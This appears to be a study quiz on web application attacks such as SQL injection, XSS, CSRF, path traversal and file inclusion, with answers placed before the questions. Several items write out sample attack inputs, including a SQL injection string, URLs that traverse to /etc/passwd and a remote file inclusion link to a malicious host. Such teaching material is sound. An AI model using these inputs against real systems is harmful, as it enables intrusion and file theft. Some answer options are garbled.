Ch 6- Test
D. SQL Injection
Consider the following string: Ben' or '1'='1 The string is an example of what type of attack? A. XSS B. XSRF C. CSRF D. SQL Injection
B. XSS attacks
Software developers should escape all characters (including spaces but excluding alphanumeric characters) with the HTML entity &#xHH; format to prevent what type of attack? A. Brute-force attacks B. XSS attacks C. CSRF attacks D. DDoS attacks
C. Directory (path) traversal
What type of attack is shown in the following URL? http://portal.h4cker.org/%2e%2e%5c%2e%2e%2f%2e%2e%5c%2e%2e%5c/omar_file.txt A. Cookie brute-force attack B. URL encoding for SQL injection C. Directory (path) traversal D. Session manipulation
D. All of these
Which of the following are examples of code inejction vulnerabilities? A. Object injections B. HTML script injections C. SQL injections D. All of these
B. Reflected XSS attacks are not persistent.
Which of the following is true about reflected XSS? A. Reflected XSS attacks are persistent B. Reflected XSS attacks are not persistent. C. Reflected XSS attack can be found by fuzzing a database. D. In reflected XSS, the payload is never sent to the server; this is similar to a blind SQL injection.
D. CSRF
Which of the following occurs when a user who is authenticate by an application through a cookie saved in the browser unwittingly send an HTTP request to a site that trust the user, subsequently triggering an unwanted action? A. Fuzzing B. Reflected XSS C. Session fixation D. CSRF
A. Read and (in some cases) execute files on the victim's system
Local file inclusion (LFI) vulnerabilities occur when a web application allows a user to submit input into files or upload files to the server. Successful exploitation could allow an attacker to perform which of the following operations? A. Read and (in some cases) execute files on the victim's system B. Inject shell code on an embedded system C. Invoke PowerShell scripts to perform lateral movement D. Execute code hosted in a system controlled by the attacker
B. Fingerprint web application development frameworks
PHPSESSID and JSESSIONID can be used to do what? A. Fingerprinting an OS B. Fingerprint web application development frameworks C. Fingerprint open ports in applications D. Fingerprint usernames and passwords
C. Insecure hidden form elements
What type of security malpractice is shown in the following example? <input type="hidden" id="123" name="price" value="100.00"> A. Weak form values B. Invalid HTML signing C. Insecure hidden form elements D. Weak ID
C. Insecure Direct Object Reference
What type of vulnerabilities can be triggered by using the parameters in the following URL? http://web.h4cker.org/changepassd?user=chris A. XSS B. SQL injection C. Insecure Direct Object Reference D. Indirect Object Reference
C. HTTP parameter pollution (HPP)
What type of vulnerabilities can be triggered by using the parameters in the following URL? https://store.h4cker.org/?search=cars&results=20&search=bikes A. XSS B. SQL injection C. HTTP parameter pollution (HPP) D. Command injection
A. Remote file inclusion
What type of vulnerability or attack is demonstrated in the following URL? http://web.h4cker.org/?page=http://malicious.h4cker.org/malways.js A. Remote file inclusion B. Local file inclusion C. Reflected XSS D. SQL injection
D. Directory (path) traversal
What type of vulnerability or attack is demonstrated in the following URL? https://store.h4cker.org/buyme/?page=../../../../../etc/passwd A. SQL injection B. DOM-based XSS C. Stored XSS D. Directory (path) traversal
C. MD5 D. RC4 E. DES
Which of the following cryptographic algorithms should be avoided? (CATA) A. SHA-256 B. AES C. MD5 D. RC4 E. DES
D. Fuzzing
Which of the following is a black-box testing technique that consists of sending malformed/semi-malformed data injection in an automated fashion? A. Brute forcing B. Bursting C. Man-in-the-middle D. Fuzzing
C. MD5
Which of the following is a hashing algorithm that should be avoided? A. DES B. RSA-1024 C. MD5 D. RC4
B. Replacing an older X-Frame-Options or CSP frame ancestors
Which of the following is a mitigation technique for preventing clickjacking attacks? A. Converting < to < B. Replacing an older X-Frame-Options or CSP frame ancestors C. Converting "e; to " D. Converting to '
C. Swagger
Which of the following is a modern framework of API documentation and development and the basis of the Open API Specification (OAS), which can be very useful for pen testers to get insights into an API? A. SOAP B. WSDL C. Swagger D. GraphQL
C. Race condition
Which of the following is a type of attack that takes place when a system or an application attempts to perform two or more operations at the same time? A. Clickjacking B. Session hijacking C. Race condition D. Reflected XSS
B. Cyber range
Which of the following is not an example of a vulnerable application that you can use to practice your penetration testing skills? A. Hackazon B. Cyber range C. DVWA D. WebGoat
A. REST
Which of the following is not an example of an HTTP method? A. REST B. PUT C. DELETE D. TRACE
B. CSRF attacks typically affect application (or websites) that rely on digital certificates that have been expired or forged.
Which of the following is not true about CSRF or XSRF attacks? A. An example of a CSRF attack is a user that is authenticated by the application through a cookie saved in the browser unwittingly sending an HTTP request to a site that trusts the user, subsequently triggering an unwanted action. B. CSRF attacks typically affect application (or websites) that rely on digital certificates that have been expired or forged. C. CSRF vulnerabilities are also referred to as one-click attacks or session riding. D. CSRF attacks can occur when unauthorized commands are transmitted from a user that is trusted by the application.
D. The session ID (or token) is temporarily equivalent to the strongest authentication method used by the application prior to authentication.
Which of the following is not true? A. The session ID is a name/value pair. B. None of these. C. Once an authenticated session has been established, the session ID (or token) is temporarily equivalent to the strongest authentication method used by the application, such as usernames and passwords, one-time passwords, and client-based digital certificates. D. The session ID (or token) is temporarily equivalent to the strongest authentication method used by the application prior to authentication.
A. In DOM-based XSS, the payload is never sent to the server. instead, the payload is only processed by the web client (browser).
Which of the following is true about DOM-based XSS? A. In DOM-based XSS, the payload is never sent to the server. instead, the payload is only processed by the web client (browser). B. None of these. C. In DOM-based XSS, the payload is never sent to the client. Instead, the payload is only processed by the web server. D. In DOM-based XSS, the payload can be sent to the server or the client.
A. All of these
Which of the following is true about clickjacking? A. All of these B. It is possible to launch a clickjacking attack by using a combination of CSS stylesheets, iframes, and text boxes to fool the user into entering information or clicking on links in an invisible frame that could be rendered from a site an attacker created. C. Clicikjacking attacks are often referred to "UI redress attacks." user keystrokes can also be hijacked using clickjacking techniques. D. Clickjacking involves using multiple transparent or opaque layers to induce a user to click on a web button or link on a page that he or she did not intend to navigate or click.
D. A best practice to avoid cookie manipulation attacks is to dynamically write to cookies using data originating from untrusted sources.
Which of the following statements is not true? A. Cookie manipulation is possible when vulnerable applications store user input and then embed that input into a response within a part of the DOM. B. An attacker can take advantage of stored DOM-based vulnerabilities to create a URL to set an arbitrary value in a user's cookie. C. The impact of a stored DOM-based vulnerability depends on the role that the cookie plays within the application. D. A best practice to avoid cookie manipulation attacks is to dynamically write to cookies using data originating from untrusted sources.
C. CSRF or XSRF
Which of the following vulnerabilities can be exploited with the parameters used in the following URL? http://h4cker.org/resource/?password_new=newpasswd&password_conf=newpasswd &Change=Change# A. SQL injection B. Session manipulation C. CSRF or XSRF D. Reflect XSS
A. All of these
You can find XSS vulnerabilities in which of the following? A. All of these B. Search fields that echo a search string back to the user C. HTTP headers D. Input fields that echo user data